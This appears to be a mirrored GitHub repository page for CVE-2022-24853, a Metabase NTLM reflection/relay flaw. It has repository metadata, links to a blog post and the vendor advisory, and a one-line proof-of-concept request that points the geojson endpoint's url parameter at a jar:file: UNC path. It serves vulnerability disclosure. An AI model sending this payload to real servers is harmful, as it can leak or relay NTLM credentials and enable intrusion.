https://github.com/secure-77/cve-2022-24853
Metabase NTLM Attack
https://github.com/secure-77/cve-2022-24853
Last synced: 4 months ago
JSON representation
Metabase NTLM Attack
- Host: GitHub
- URL: https://github.com/secure-77/cve-2022-24853
- Owner: secure-77
- Created: 2022-04-16T19:41:15.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2022-08-12T09:05:20.000Z (almost 4 years ago)
- Last Synced: 2025-01-27T23:19:19.812Z (over 1 year ago)
- Size: 1.95 KB
- Stars: 2
- Watchers: 3
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2022-24853
Metabase NTLM Reflection / Relay Attack [CVE-2022-24853](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24853)
Blog Post about the finding: https://secure77.de/metabase-ntlm-relay-attack/
Github Security Advisory: https://github.com/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m
## POC
```plain
http://metabase-target-server.com/api/geojson?url=jar:file:\\test.txt!/
```